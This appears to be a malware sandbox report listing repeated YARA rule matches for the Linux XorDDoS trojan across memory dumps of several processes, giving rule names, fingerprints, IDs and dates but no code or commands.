Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
